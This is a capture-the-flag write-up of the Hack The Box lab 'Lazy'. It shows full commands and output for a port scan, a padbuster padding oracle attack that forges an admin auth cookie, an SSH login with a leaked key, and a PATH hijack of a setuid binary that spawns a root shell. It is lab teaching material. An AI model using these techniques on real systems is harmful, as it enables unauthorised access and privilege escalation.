Today we are going to solve a CTF Challenge “Lazy”. It is a lab that is developed by Hack the Box. They have an amazing collection of Online Labs, on which you can practice your penetration testing skills. They have labs which are designed for beginners to the Expert penetration testers. Lazy is a Retired Lab.
Level: Medium
Task: Find the user.txt and root.txt in the vulnerable Lab.
Let’s Begin!
As these labs are only available online, therefore, they have a static IP. Lazy Lab has IP: 10.10.10.18.
Now, as always let’s begin our hacking with the port enumeration.
c:\Users\jacco>nmap -sC -sV 10.10.10.18 Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-09 19:43 W. Europe Standard Time Nmap scan report for 10.10.10.18 Host is up (0.028s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 e1:92:1b:48:f8:9b:63:96:d4:e5:7a:40:5f:a4:c8:33 (DSA) | 2048 af:a0:0f:26:cd:1a:b5:1f:a7:ec:40:94:ef:3c:81:5f (RSA) | 256 11:a3:2f:25:73:67:af:70:18:56:fe:a2:e3:54:81:e8 (ECDSA) |_ 256 96:81:9c:f4:b7:bc:1a:73:05:ea:ba:41:35:a4:66:b7 (ED25519) 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: CompanyDev Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 23.15 seconds
The Port 80 is open so let’s open IP in our browser to see that if a website is hosted on the IP. After opening the IP in the browser, we were greeted by a simple page with Register and Login Links. Clicking on the Register opens up a form.
Then I decided to register as admin: 123 for username and password respectively.
But I got an alert “Duplicate entry ‘admin’ for key PRIMARY”, also received error “can’t create the user: user exists” when I registered as admin. Hence username “admin” is already registered
At last, I decided to use the burp suite for capturing browser request. Here I simply register with puck as username and password iestyle
And got intercepted request, here I saw auth cookie. Then I send the intercept request to the repeater for analyses its response. It gave a hint “invalid padding” which means there could be padding oracle vulnerability. To know more about what is padding oracle vulnerability read our previous article from here. Since I had already faced such a situation in my past experience, therefore, I know what to do next.
Next, open the terminal to run the command shown in the given image which contains target URL and above-copied auth cookie Last part of screenshot has captured three decrypt values in base64, HEX, and ASCII. The cookie of auth is a combination of username with its password from padbuster we came to know what is the encrypted value of username for admin. We are very near to our goal just encrypt this auth cookie with the user as admin once again. Here we have our plaintext as admin and let’s encode it using padbuster.
root@kali:~/htb/lazy# padbuster http://10.10.10.18 gtS9RNEjsR5q8y2qUe%2Br7xplcH4mHld8 8 -cookies auth=gtS9RNEjsR5q8y2qUe%2Br7xplcH4mHld8 -encoding 0 +-------------------------------------------+ | PadBuster - v0.3.3 | | Brian Holyfield - Gotham Digital Science | | labs@gdssecurity.com | +-------------------------------------------+ INFO: The original request returned the following [+] Status: 200 [+] Location: N/A [+] Content Length: 978 INFO: Starting PadBuster Decrypt Mode *** Starting Block 1 of 2 *** INFO: No error string was provided...starting response analysis *** Response Analysis Complete *** The following response signatures were returned: ------------------------------------------------------- ID# Freq Status Length Location ------------------------------------------------------- 1 1 200 1133 N/A 2 ** 255 200 15 N/A ------------------------------------------------------- Enter an ID that matches the error condition NOTE: The ID# marked with ** is recommended : 2 Continuing test with selection 2 [+] Success: (132/256) [Byte 8] [+] Success: (58/256) [Byte 7] [+] Success: (176/256) [Byte 6] [+] Success: (24/256) [Byte 5] [+] Success: (205/256) [Byte 4] [+] Success: (34/256) [Byte 3] [+] Success: (96/256) [Byte 2] [+] Success: (1/256) [Byte 1] Block 1 Results: [+] Cipher Text (HEX): 6af32daa51efabef [+] Intermediate Bytes (HEX): f7a7d836ec53c47d [+] Plain Text: user=puc Use of uninitialized value $plainTextBytes in concatenation (.) or string at /usr/bin/padbuster line 361, <STDIN> line 1. *** Starting Block 2 of 2 *** [+] Success: (23/256) [Byte 8] [+] Success: (82/256) [Byte 7] [+] Success: (21/256) [Byte 6] [+] Success: (174/256) [Byte 5] [+] Success: (88/256) [Byte 4] [+] Success: (212/256) [Byte 3] [+] Success: (13/256) [Byte 2] [+] Success: (247/256) [Byte 1] Block 2 Results: [+] Cipher Text (HEX): 1a65707e261e577c [+] Intermediate Bytes (HEX): 01f42aad56e8ace8 [+] Plain Text: k ------------------------------------------------------- ** Finished *** [+] Decrypted value (ASCII): user=puck [+] Decrypted value (HEX): 757365723D7075636B07070707070707 [+] Decrypted value (Base64): dXNlcj1wdWNrBwcHBwcHBw== ------------------------------------------------------- root@kali:~/htb/lazy# padbuster http://10.10.10.18 gtS9RNEjsR5q8y2qUe%2Br7xplcH4mHld8 8 -cookies auth=gtS9RNEjsR5q8y2qUe%2Br7xplcH4mHld8 -encoding 0 -plaintext user=admin +-------------------------------------------+ | PadBuster - v0.3.3 | | Brian Holyfield - Gotham Digital Science | | labs@gdssecurity.com | +-------------------------------------------+ INFO: The original request returned the following [+] Status: 200 [+] Location: N/A [+] Content Length: 978 INFO: Starting PadBuster Encrypt Mode [+] Number of Blocks: 2 INFO: No error string was provided...starting response analysis *** Response Analysis Complete *** The following response signatures were returned: ------------------------------------------------------- ID# Freq Status Length Location ------------------------------------------------------- 1 1 200 1133 N/A 2 ** 255 200 15 N/A ------------------------------------------------------- Enter an ID that matches the error condition NOTE: The ID# marked with ** is recommended : 2 Continuing test with selection 2 [+] Success: (196/256) [Byte 8] [+] Success: (148/256) [Byte 7] [+] Success: (92/256) [Byte 6] [+] Success: (41/256) [Byte 5] [+] Success: (218/256) [Byte 4] [+] Success: (136/256) [Byte 3] [+] Success: (150/256) [Byte 2] [+] Success: (190/256) [Byte 1] Block 2 Results: [+] New Cipher Text (HEX): 23037825d5a1683b [+] Intermediate Bytes (HEX): 4a6d7e23d3a76e3d [+] Success: (1/256) [Byte 8] [+] Success: (36/256) [Byte 7] [+] Success: (180/256) [Byte 6] [+] Success: (17/256) [Byte 5] [+] Success: (146/256) [Byte 4] [+] Success: (50/256) [Byte 3] [+] Success: (132/256) [Byte 2] [+] Success: (135/256) [Byte 1] Block 1 Results: [+] New Cipher Text (HEX): 0408ad19d62eba93 [+] Intermediate Bytes (HEX): 717bc86beb4fdefe ------------------------------------------------------- ** Finished *** [+] Encrypted value is: BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA ------------------------------------------------------- root@kali:~/htb/lazy#
Now replace the original auth cookie from the encrypted value which you have copied above and forwarded the intercepted request.
When request sent by burp suite, automatically on the web server you will get logged in as an admin account. After that when you will access the admin page you will get a URL “my key” that offers us with a username mitsos and an ssh key.
So as you can observe that we had opened the ssh key let’s save it into a text file as “key” on the desktop and if you notice the URL can read ssh login username mitsos.
First, let’s download the key and then give appropriate permission. Now that we have the ssh username and key let’s get an ssh session.
PS C:\PENTEST\htb\LAZY> ssh -i key mitsos@10.10.10.18 Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686) * Documentation: https://help.ubuntu.com/ System information as of Sat Mar 9 20:39:46 EET 2019 System load: 0.0 Processes: 174 Usage of /: 7.7% of 18.58GB Users logged in: 0 Memory usage: 11% IP address for eth0: 10.10.10.18 Swap usage: 0% Graph this data and manage this system at: https://landscape.canonical.com/ Last login: Sat Mar 9 20:39:47 2019 from 10.10.14.20 mitsos@LazyClown:~$ ls backup peda user.txt mitsos@LazyClown:~$ cat user.txt d55*****3fc
As we saw above that we have the peda and backup folder too. On running the executable backup we saw that it prints the shadow file with user hashes. So we ran the strings command and found that it does contain command “cat /etc/shadow”
mitsos@LazyClown:~$ strings backup /lib/ld-linux.so.2 libc.so.6 _IO_stdin_used system __libc_start_main __gmon_start__ GLIBC_2.0 PTRh [^_] cat /etc/shadow ;*2$" GCC: (Ubuntu 4.8.4-2ubuntu1~14.04.3) 4.8.4 .symtab .strtab
Now, all we need to do was to create a personalized executable cat file, which can be done as shown in the below image. Here we are reprogramming cat to give us the shell, on execution.
mitsos@LazyClown:~$ ls -la total 64 drwxr-xr-x 5 mitsos mitsos 4096 May 3 2017 . drwxr-xr-x 3 root root 4096 May 2 2017 .. -rwsrwsr-x 1 root root 7303 May 3 2017 backup -rw------- 1 mitsos mitsos 224 May 3 2017 .bash_history -rw-r--r-- 1 root root 1 May 3 2017 .bash.history -rw-r--r-- 1 mitsos mitsos 220 May 2 2017 .bash_logout -rw-r--r-- 1 mitsos mitsos 3637 May 2 2017 .bashrc drwx------ 2 mitsos mitsos 4096 May 2 2017 .cache -rw------- 1 mitsos mitsos 2524 May 2 2017 .gdb_history -rw-rw-r-- 1 mitsos mitsos 22 May 2 2017 .gdbinit -rw------- 1 root root 46 May 2 2017 .nano_history drwxrwxr-x 4 mitsos mitsos 4096 May 2 2017 peda -rw-r--r-- 1 mitsos mitsos 675 May 2 2017 .profile drwxrwxr-x 2 mitsos mitsos 4096 May 2 2017 .ssh -r--r--r-- 1 mitsos mitsos 33 Jan 18 2018 user.txt mitsos@LazyClown:~$ export PATH=.:$PATH mitsos@LazyClown:~$ echo "/bin/sh" > cat mitsos@LazyClown:~$ chmod 777 cat mitsos@LazyClown:~$ ./backup # whoami root # cd / # ls root.txt # less root.txt 990*****515
Author: Jacco Straathof